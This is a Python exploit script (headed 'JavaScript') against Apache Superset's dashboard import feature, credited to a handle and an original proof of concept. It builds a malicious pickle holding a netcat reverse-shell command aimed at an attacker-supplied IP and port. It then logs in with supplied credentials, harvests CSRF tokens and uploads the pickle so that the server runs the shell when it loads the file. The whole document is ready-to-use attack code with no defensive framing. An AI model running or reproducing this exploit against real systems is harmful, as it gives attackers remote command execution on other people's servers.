JavaScript:
'''_____________________________________________________________________
|[] SHELL |ROOT]|!"|
|"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""|"|
|CODED BY > R3DXPLOIT(JIMMY) | |
|EMAIL > [email protected] | |
|Original PoC by David May ([email protected]) | |
|_____________________________________________________________________|/|
'''
import sys
import os
from lxml import html
import requests
import argparse
headers_dict = {
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0',
'DNT': '1',
'Connection': 'close',
'Upgrade-Insecure-Requests': '1',
}
def main() :
parser = argparse.ArgumentParser()
parser.add_argument('-t', '--tcp', help='tcp ip for shell', dest='tcp' , required = True )
parser.add_argument('-tp', '--tport', help='tcp port for shell', dest='tport', required = True)
parser.add_argument('-i', '--ip', help='ip', dest='ip', required = True)
parser.add_argument('-p', '--port', help='port', dest='port', required = True)
parser.add_argument('-U', '--user', help='User must belong to user with can Import Dashboards on Superset privilege', dest='user', required = True)
parser.add_argument('-P', '--passw', help='pass must belong to user with can Import Dashboards on Superset privilege', dest='passw', required = True)
args = parser.parse_args()
# Script arguments
args.port = args.port
# Verify these URLs match your environment
login_URL = 'http://' + args.tcp + ':' + args.tport + '/login/'
upload_URL = 'http://' + args.tcp + ':' + args.tport + '/superset/import_dashboards'
if os.path.isfile(str(args.ip)+'_'+str(args.port)+'.pickle'):
os.remove(str(args.ip)+'_'+str(args.port)+'.pickle')
headers_dict = {
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0',
'DNT': '1',
'Connection': 'close',
'Upgrade-Insecure-Requests': '1',
}
evilPickle = open(str(args.ip)+'_'+str(args.port)+'.pickle','w+')
evilPickle.write('cos\nsystem\n(S\'rm /tmp/backpipe;mknod /tmp/backpipe p;/bin/sh 0</tmp/backpipe | nc ' + args.ip + ' ' + args.port + ' 1>/tmp/backpipe\'\ntR.')
evilPickle.close()
try :
session = requests.session()
login_page = session.get(login_URL)
if login_page.status_code != 200:
print('Login page not reached')
login_tree = html.fromstring(login_page.content)
token = login_tree.xpath('//input[@id="csrf_token"]/@value')
login_data = {
'token' : token,
'username' : args.user,
'password' : args.passw,
}
headers_dict['Referer'] = login_URL
login = session.post(login_URL, headers=headers_dict, data=login_data)
upload_page = session.get(upload_URL)
if upload_page.status_code != 200:
print('Upload page not reached')
upload_tree = html.fromstring(upload_page.content)
token = upload_tree.xpath('//input[@id="csrf_token"]/@value')
headers_dict['Referer'] = upload_URL
upload = session.post(upload_URL, headers=headers_dict, data={'token':token}, files={'file':(str(args.ip)+'_'+str(args.port)+'.pickle',open(str(args.ip)+'_'+str(args.port)+'.pickle','rb'),'application/octet-stream')})
session.close()
sys.exit()
except requests.exceptions.ConnectionError :
print('Connection Refused, Check The IP and PORT!!!')
except Exception as e:
print('Error :\n\n' , e)
if __name__ == "__main__" :
main()